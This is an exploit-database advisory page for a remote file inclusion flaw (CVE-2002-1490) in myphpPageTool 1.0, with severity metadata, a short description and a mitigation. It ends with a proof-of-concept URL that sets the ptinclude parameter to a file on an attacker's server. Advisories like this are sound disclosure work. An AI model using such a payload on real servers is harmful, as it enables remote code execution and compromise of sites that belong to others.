header-logo
Suggest Exploit
vendor:
myphpPageTool
by:
SecurityFocus
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: myphpPageTool
Affected Version From: myphpPageTool 1.0
Affected Version To: myphpPageTool 1.0
Patch Exists: YES
Related CWE: CVE-2002-1490
CPE: o:myphppagetool:myphppagetool:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2002

myphpPageTool Remote File Inclusion Vulnerability

myphpPageTool is prone to a remote file inclusion vulnerability due to insufficient sanitization of user-supplied input. An attacker can exploit this vulnerability by manipulating some URI parameters to include a malicious file from a remote server.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in file operations.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6744/info

myphpPageTool is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in several PHP script files in the /doc/admin folder.

Under some circumstances, it is possible for remote attackers to influence the include path for 'pt_config.inc' to point to an external file on a remote server by manipulating some URI parameters.

http://[target]/doc/admin/index.php?ptinclude=http://[attacker]/pt_config.inc